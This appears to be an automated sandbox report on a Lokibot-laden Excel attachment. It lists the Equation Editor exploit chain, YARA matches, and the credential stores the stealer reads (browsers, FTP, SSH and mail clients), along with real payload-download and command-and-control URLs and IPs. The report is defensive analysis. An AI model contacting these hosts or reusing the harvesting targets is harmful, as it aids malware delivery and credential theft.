              Source: 4.3.vbc.exe.3e0000.0.raw.unpack, type: UNPACKEDPE, Matched rule: detect Lokibot in memory, Author: JPCERT/CC Incident Response Group
              Source: 4.2.vbc.exe.220e50.0.unpack, type: UNPACKEDPE, Matched rule: Loki Payload, Author: kevoreilly
              Source: 4.2.vbc.exe.220e50.0.unpack, type: UNPACKEDPE, Matched rule: detect Lokibot in memory, Author: JPCERT/CC Incident Response Group
              Source: 4.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE, Matched rule: Loki Payload, Author: kevoreilly
              Source: 4.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE, Matched rule: detect Lokibot in memory, Author: JPCERT/CC Incident Response Group
              Source: 00000004.00000003.455823492.00000000003E0000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Loki Payload, Author: kevoreilly
              Source: 00000004.00000003.455823492.00000000003E0000.00000004.00000001.sdmp, type: MEMORY, Matched rule: detect Lokibot in memory, Author: JPCERT/CC Incident Response Group
              Source: 00000004.00000002.664242686.0000000000220000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Lokibot in memory, Author: JPCERT/CC Incident Response Group
              Source: 00000004.00000002.664285691.0000000000400000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Loki Payload, Author: kevoreilly
              Source: 00000004.00000002.664285691.0000000000400000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Lokibot in memory, Author: JPCERT/CC Incident Response Group
              Office equation editor drops PE file
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, File created: C:\Users\Public\vbc.exe
              Source: 4.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE, Matched rule: Loki_1, author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 4.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE, Matched rule: Lokibot, hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 4.2.vbc.exe.220e50.0.raw.unpack, type: UNPACKEDPE, Matched rule: SUSP_XORed_URL_in_EXE, date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
              Source: 4.2.vbc.exe.220e50.0.raw.unpack, type: UNPACKEDPE, Matched rule: Loki_1, author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 4.2.vbc.exe.220e50.0.raw.unpack, type: UNPACKEDPE, Matched rule: Lokibot, hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 4.3.vbc.exe.3e0000.0.unpack, type: UNPACKEDPE, Matched rule: SUSP_XORed_URL_in_EXE, date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
              Source: 4.3.vbc.exe.3e0000.0.unpack, type: UNPACKEDPE, Matched rule: Loki_1, author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 4.3.vbc.exe.3e0000.0.unpack, type: UNPACKEDPE, Matched rule: Lokibot, hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 4.3.vbc.exe.3e0000.0.raw.unpack, type: UNPACKEDPE, Matched rule: SUSP_XORed_URL_in_EXE, date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
              Source: 4.3.vbc.exe.3e0000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Loki_1, author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 4.3.vbc.exe.3e0000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Lokibot, hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 4.2.vbc.exe.220e50.0.unpack, type: UNPACKEDPE, Matched rule: SUSP_XORed_URL_in_EXE, date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
              Source: 4.2.vbc.exe.220e50.0.unpack, type: UNPACKEDPE, Matched rule: Loki_1, author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 4.2.vbc.exe.220e50.0.unpack, type: UNPACKEDPE, Matched rule: Lokibot, hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 4.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE, Matched rule: Loki_1, author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 4.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE, Matched rule: Lokibot, hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 00000004.00000003.455823492.00000000003E0000.00000004.00000001.sdmp, type: MEMORY, Matched rule: SUSP_XORed_URL_in_EXE, date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
              Source: 00000004.00000003.455823492.00000000003E0000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Loki_1, author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 00000004.00000003.455823492.00000000003E0000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Lokibot, hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 00000004.00000002.664242686.0000000000220000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Lokibot, hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 00000004.00000002.664285691.0000000000400000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Loki_1, author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 00000004.00000002.664285691.0000000000400000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Lokibot, hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: C:\Users\Public\vbc.exe, Code function: 4_2_0040549C
              Source: C:\Users\Public\vbc.exe, Code function: 4_2_004029D4
              Source: C:\Users\Public\vbc.exe, Code function: 4_2_00222C24
              Source: C:\Users\Public\vbc.exe, Code function: 4_2_002256EC
              Source: C:\Users\Public\vbc.exe, Code function: String function: 0041219C appears 45 times
              Source: C:\Users\Public\vbc.exe, Code function: String function: 00405B6F appears 42 times
              Source: C:\Users\Public\vbc.exe, Registry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Mozilla\Mozilla Firefox\52.0.1 (x86 en-US)\Main Install Directory
              Source: vbc[1].exe.2.dr, Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: vbc.exe.2.dr, Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: C:\Users\Public\vbc.exe, Memory allocated: 76F90000 page execute and read and write
              Source: C:\Users\Public\vbc.exe, Memory allocated: 76E90000 page execute and read and write
              Source: vbc[1].exe.2.dr, Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
              Source: vbc.exe.2.dr, Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
              Source: C:\Users\Public\vbc.exe, Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: unknown, Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
              Source: unknown, Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
              Source: C:\Users\Public\vbc.exe, Code function: 4_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges,
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File created: C:\Users\user\Desktop\~$Original shipping documents.xlsx
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File created: C:\Users\user\AppData\Local\Temp\CVRD190.tmp
              Source: classification engine, Classification label: mal100.troj.spyw.expl.evad.winXLSX@4/15@142/2
              Source: C:\Users\Public\vbc.exe, Code function: 4_2_0040434D CoInitialize,CoCreateInstance,VariantInit,SysAllocString,VariantInit,VariantInit,SysAllocString,VariantInit,SysFreeString,SysFreeString,CoUninitialize,
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File read: C:\Users\desktop.ini
              Source: C:\Users\Public\vbc.exe, Mutant created: \Sessions\1\BaseNamedObjects\DE4229FCF97F5879F50F8FD3
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, File read: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Users\Public\vbc.exe, File read: C:\Windows\System32\drivers\etc\hosts
              Source: Window Recorder, Window detected: More than 3 window changes detected
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
              Source: Binary string: 5}NC:\yasacogirig_reyeg56\zajotowuyavi\yezufemeloya.pdb source: vbc.exe, 00000004.00000000.448184731.0000000000418000.00000002.00020000.sdmp, vbc.exe.2.dr
              Source: Binary string: C:\yasacogirig_reyeg56\zajotowuyavi\yezufemeloya.pdb source: vbc.exe, 00000004.00000000.448184731.0000000000418000.00000002.00020000.sdmp, vbc.exe.2.dr

              Data Obfuscation:

              Detected unpacking (overwrites its own PE header)
              Source: C:\Users\Public\vbc.exe, Unpacked PE file: 4.2.vbc.exe.400000.1.unpack
              Detected unpacking (changes PE section rights)
              Source: C:\Users\Public\vbc.exe, Unpacked PE file: 4.2.vbc.exe.400000.1.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.x:W;
              Yara detected aPLib compressed binary
              Source: Yara match, File source: 4.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara match, File source: 4.2.vbc.exe.220e50.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match, File source: 4.3.vbc.exe.3e0000.0.unpack, type: UNPACKEDPE
              Source: Yara match, File source: 4.3.vbc.exe.3e0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match, File source: 4.2.vbc.exe.220e50.0.unpack, type: UNPACKEDPE
              Source: Yara match, File source: 4.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
              Source: Yara match, File source: 00000004.00000003.455823492.00000000003E0000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara match, File source: 00000004.00000002.664242686.0000000000220000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara match, File source: 00000004.00000002.664285691.0000000000400000.00000040.00020000.sdmp, type: MEMORY
              Source: Yara match, File source: Process Memory Space: vbc.exe PID: 1268, type: MEMORYSTR
              Source: C:\Users\Public\vbc.exe, Code function: 4_2_00402AC0 push eax; ret
              Source: C:\Users\Public\vbc.exe, Code function: 4_2_00222D10 push eax; ret
              Source: C:\Users\Public\vbc.exe, Code function: 4_2_0092E4B7 push edi; retf
              Source: C:\Users\Public\vbc.exe, Code function: 4_2_0092E911 push E83768D8h; retf
              Source: C:\Users\Public\vbc.exe, Code function: 4_2_0092DABF push ebp; ret
              Source: C:\Users\Public\vbc.exe, Code function: 4_2_0092AEFB push eax; ret
              Source: C:\Users\Public\vbc.exe, Code function: 4_2_0092B7BA push es; ret
              Source: initial sample, Static PE information: section name: .text entropy: 7.74250778335
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, File created: C:\Users\Public\vbc.exe
              Source: C:\Users\Public\vbc.exe, File created: C:\Users\user\AppData\Roaming\CF97F5\5879F5.exe (copy)

              Boot Survival:

              Drops PE files to the user root directory
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, File created: C:\Users\Public\vbc.exe
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Process information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Process information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exe, Process information set: NOGPFAULTERRORBOX
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2032, Thread sleep time: -300000s >= -30000s
              Source: C:\Users\Public\vbc.exe TID: 2028, Thread sleep time: -420000s >= -30000s
              Source: C:\Users\Public\vbc.exe, Code function: 4_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,
              Source: C:\Users\Public\vbc.exe, Thread delayed: delay time: 60000
              Source: C:\Users\Public\vbc.exe, Code function: 4_2_00402B7C GetProcessHeap,RtlAllocateHeap,
              Source: C:\Users\Public\vbc.exe, Process token adjusted: Debug
              Source: C:\Users\Public\vbc.exe, Code function: 4_2_0040317B mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\Public\vbc.exe, Code function: 4_2_0022092B mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\Public\vbc.exe, Code function: 4_2_00220D90 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\Public\vbc.exe, Code function: 4_2_002233CB mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\Public\vbc.exe, Code function: 4_2_00928E7B push dword ptr fs:[00000030h]
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
              Source: vbc.exe, 00000004.00000002.664494803.0000000000A00000.00000002.00020000.sdmp, Binary or memory string: Shell_TrayWnd
              Source: vbc.exe, 00000004.00000002.664494803.0000000000A00000.00000002.00020000.sdmp, Binary or memory string: !Progman
              Source: vbc.exe, 00000004.00000002.664494803.0000000000A00000.00000002.00020000.sdmp, Binary or memory string: Program Manager<
              Source: C:\Users\Public\vbc.exe, Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db VolumeInformation
              Source: C:\Users\Public\vbc.exe, Queries volume information: C:\ VolumeInformation
              Source: C:\Users\Public\vbc.exe, Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db VolumeInformation
              Source: C:\Users\Public\vbc.exe, Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db VolumeInformation
              Source: C:\Users\Public\vbc.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
              Source: C:\Users\Public\vbc.exe, Code function: 4_2_00406069 GetUserNameW,

              Stealing of Sensitive Information:

              Yara detected Lokibot
              Source: Yara match, File source: 4.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara match, File source: 4.2.vbc.exe.220e50.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match, File source: 4.3.vbc.exe.3e0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match, File source: 4.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
              Source: Yara match, File source: 00000004.00000003.455823492.00000000003E0000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara match, File source: 00000004.00000002.664242686.0000000000220000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara match, File source: 00000004.00000002.664285691.0000000000400000.00000040.00020000.sdmp, type: MEMORY
              Source: Yara match, File source: Process Memory Space: vbc.exe PID: 1268, type: MEMORYSTR
              Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
              Source: C:\Users\Public\vbc.exe, Key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions
              Source: C:\Users\Public\vbc.exe, Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl
              Tries to harvest and steal ftp login credentials
              Source: C:\Users\Public\vbc.exe, File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
              Source: C:\Users\Public\vbc.exe, File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts
              Source: C:\Users\Public\vbc.exe, File opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings
              Source: C:\Users\Public\vbc.exe, File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts
              Tries to steal Mail credentials (via file registry)
              Source: C:\Users\Public\vbc.exe, Code function: PopPassword
              Source: C:\Users\Public\vbc.exe, Code function: SmtpPassword
              Tries to steal Mail credentials (via file access)
              Source: C:\Users\Public\vbc.exe, Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
              Source: C:\Users\Public\vbc.exe, Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
              Tries to harvest and steal browser information (history, passwords, etc)
              Source: C:\Users\Public\vbc.exe, File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db
              Source: C:\Users\Public\vbc.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
              Source: C:\Users\Public\vbc.exe, File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
              Source: C:\Users\Public\vbc.exe, File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db
              Source: C:\Users\Public\vbc.exe, File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db
              Source: Yara match, File source: 4.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara match, File source: 4.2.vbc.exe.220e50.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match, File source: 4.3.vbc.exe.3e0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match, File source: 4.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
              Source: Yara match, File source: 00000004.00000003.455823492.00000000003E0000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara match, File source: 00000004.00000002.664242686.0000000000220000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara match, File source: 00000004.00000002.664285691.0000000000400000.00000040.00020000.sdmp, type: MEMORY

              Mitre Att&ck Matrix

              Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
              Valid Accounts | Exploitation for Client Execution 13 | Path Interception | Access Token Manipulation 1 | Deobfuscate/Decode Files or Information 1 | OS Credential Dumping 2 | Account Discovery 1 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Ingress Tool Transfer 13 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
              Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Process Injection 12 | Obfuscated Files or Information 3 | Credentials in Registry 2 | File and Directory Discovery 2 | Remote Desktop Protocol | Man in the Browser 1 | Exfiltration Over Bluetooth | Encrypted Channel 1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
              Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Software Packing 22 | Security Account Manager | System Information Discovery 13 | SMB/Windows Admin Shares | Data from Local System 2 | Automated Exfiltration | Non-Application Layer Protocol 3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
              Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Masquerading 111 | NTDS | Security Software Discovery 1 | Distributed Component Object Model | Email Collection 1 | Scheduled Transfer | Application Layer Protocol 123 | SIM Card Swap |  | Carrier Billing Fraud
              Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Virtualization/Sandbox Evasion 11 | LSA Secrets | Process Discovery 1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication |  | Manipulate App Store Rankings or Ratings
              Replication Through Removable Media | Launchd | Rc.common | Rc.common | Access Token Manipulation 1 | Cached Domain Credentials | Virtualization/Sandbox Evasion 11 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service |  | Abuse Accessibility Features
              External Remote Services | Scheduled Task | Startup Items | Startup Items | Process Injection 12 | DCSync | System Owner/User Discovery 1 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points |  | Data Encrypted for Impact
              Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | Remote System Discovery 1 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols |  | Generate Fraudulent Advertising Revenue

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              No Antivirus matches

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              Source | Detection | Scanner | Label
              4.2.vbc.exe.220e50.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
              4.2.vbc.exe.400000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
              4.1.vbc.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
              4.3.vbc.exe.3e0000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen

              Domains

              No Antivirus matches

              URLs

              Source | Detection | Scanner | Label
              http://www.%s.comPA | 0% | URL Reputation | safe
              http://kbfvzoboss.bid/alien/fre.php | 0% | URL Reputation | safe
              http://alphastand.win/alien/fre.php | 0% | URL Reputation | safe
              http://alphastand.trade/alien/fre.php | 0% | URL Reputation | safe
              http://checkvim.com/ga14/fre.php | 100% | Avira URL Cloud | malware
              http://103.155.83.184/wdc/vbc.exe | 0% | Avira URL Cloud | safe
              http://alphastand.top/alien/fre.php | 0% | URL Reputation | safe
              http://www.ibsensoftware.com/ | 0% | URL Reputation | safe

              Domains and IPs

              Contacted Domains

              Name | IP | Active | Malicious | Antivirus Detection | Reputation
              checkvim.com | 5.188.89.50 | true | true |  | unknown

                Contacted URLs

                Name | Malicious | Antivirus Detection | Reputation
                http://kbfvzoboss.bid/alien/fre.php | true | URL Reputation: safe | unknown
                http://alphastand.win/alien/fre.php | true | URL Reputation: safe | unknown
                http://alphastand.trade/alien/fre.php | true | URL Reputation: safe | unknown
                http://checkvim.com/ga14/fre.php | true | Avira URL Cloud: malware | unknown
                http://103.155.83.184/wdc/vbc.exe | true | Avira URL Cloud: safe | unknown
                http://alphastand.top/alien/fre.php | true | URL Reputation: safe | unknown

                URLs from Memory and Binaries

                Name | Source | Malicious | Antivirus Detection | Reputation
                http://www.%s.comPA | vbc.exe, 00000004.00000002.664629094.0000000002700000.00000002.00020000.sdmp | false | URL Reputation: safe | low
                http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous. | vbc.exe, 00000004.00000002.664629094.0000000002700000.00000002.00020000.sdmp | false |  | high
                http://www.day.com/dam/1.0 | 89D14D5A.emf.0.dr | false |  | high
                http://www.ibsensoftware.com/ | vbc.exe, vbc.exe, 00000004.00000002.664285691.0000000000400000.00000040.00020000.sdmp | false | URL Reputation: safe | unknown

                    Contacted IPs


                    Public

                    IP | Domain | Country | Flag | ASN | ASN Name | Malicious
                    5.188.89.50 | checkvim.com | Russian Federation | | 34665 | PINDC-ASRU | true
                    103.155.83.184 | unknown | unknown | | 134687 | TWIDC-AS-APTWIDCLimitedHK | true

                    General Information

                    Joe Sandbox Version:33.0.0 White Diamond
                    Analysis ID:491904
                    Start date:28.09.2021
                    Start time:06:49:13
                    Joe Sandbox Product:CloudBasic
                    Overall analysis duration:0h 5m 38s
                    Hypervisor based Inspection enabled:false
                    Report type:light
                    Sample file name:Original shipping documents.xlsx
                    Cookbook file name:defaultwindowsofficecookbook.jbs
                    Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                    Number of analysed new started processes analysed:6
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • HDC enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Detection:MAL
                    Classification:mal100.troj.spyw.expl.evad.winXLSX@4/15@142/2
                    EGA Information:Failed
                    HDC Information:
                    • Successful, ratio: 42.6% (good quality ratio 40.8%)
                    • Quality average: 77.2%
                    • Quality standard deviation: 28.8%
                    HCA Information:Failed
                    Cookbook Comments:
                    • Adjust boot time
                    • Enable AMSI
                    • Found application associated with file extension: .xlsx
                    • Found Word or Excel or PowerPoint or XPS Viewer
                    • Attach to Office via COM
                    • Scroll down
                    • Close Viewer
                    Warnings:
                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe
                    • HTTP Packets have been reduced
                    • TCP Packets have been reduced to 100
                    • Report size getting too big, too many NtDeviceIoControlFile calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.

                    Simulations

                    Behavior and APIs

                    Time | Type | Description
                    06:50:35 | API Interceptor | 72x Sleep call for process: EQNEDT32.EXE modified
                    06:50:43 | API Interceptor | 837x Sleep call for process: vbc.exe modified

                    Joe Sandbox View / Context

                    IPs

                    Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
                    103.155.83.184 | Original_Docs_of_272108-27110.xlsx | | malicious | | 103.155.83.184/winx/vbc.exe
                    103.155.83.184 | Original Docs of 272108-27110.xlsx | | malicious | | 103.155.83.184/winx/vbc.exe



                    JA3 Fingerprints

                    No context

                    Dropped Files

                    No context

                    Created / dropped Files

                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe
                    Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                    Category:downloaded
                    Size (bytes):210432
                    Entropy (8bit):6.97232515193582
                    Encrypted:false
                    SSDEEP:3072:2v+ArX9FLxOhanZBsX3PovEuKwEXLqfP6GB6klGfLIQVNWBz:6+KnIanZyHPoqqfSGB6k8Txql
                    MD5:59A67B5CCF01B6A564265797DC5E53E8
                    SHA1:996281D368FCC2CEFE5BF99399CCB19299C6F8FF
                    SHA-256:E4C1C0121487F83B014B8C81BBAF03DB0B7F49584A268A5E67CA64BA6E64676F
                    SHA-512:3BEB988E323C9A9F8DEB04E845DA157E34EC1F564B5CF8681A7ACA490A9FB5A1D4F1D4A10D80AD2D9C7D1742C56B93CFD113352FA80E38C4BAB46695C6F527CD
                    Malicious:true
                    Reputation:low
                    IE Cache URL:http://103.155.83.184/wdc/vbc.exe
                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1599A1F2.jpeg
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 191x263, frames 3
                    Category:dropped
                    Size (bytes):8815
                    Entropy (8bit):7.944898651451431
                    Encrypted:false
                    SSDEEP:192:Qjnr2Il8e7li2YRD5x5dlyuaQ0ugZIBn+0O2yHQGYtPto:QZl8e7li2YdRyuZ0b+JGgtPW
                    MD5:F06432656347B7042C803FE58F4043E1
                    SHA1:4BD52B10B24EADECA4B227969170C1D06626A639
                    SHA-256:409F06FC20F252C724072A88626CB29F299167EAE6655D81DF8E9084E62D6CF6
                    SHA-512:358FEB8CBFFBE6329F31959F0F03C079CF95B494D3C76CF3669D28CA8CDB42B04307AE46CED1FC0605DEF31D9839A0283B43AA5D409ADC283A1CAD787BE95F0E
                    Malicious:false
                    Reputation:moderate, very likely benign file
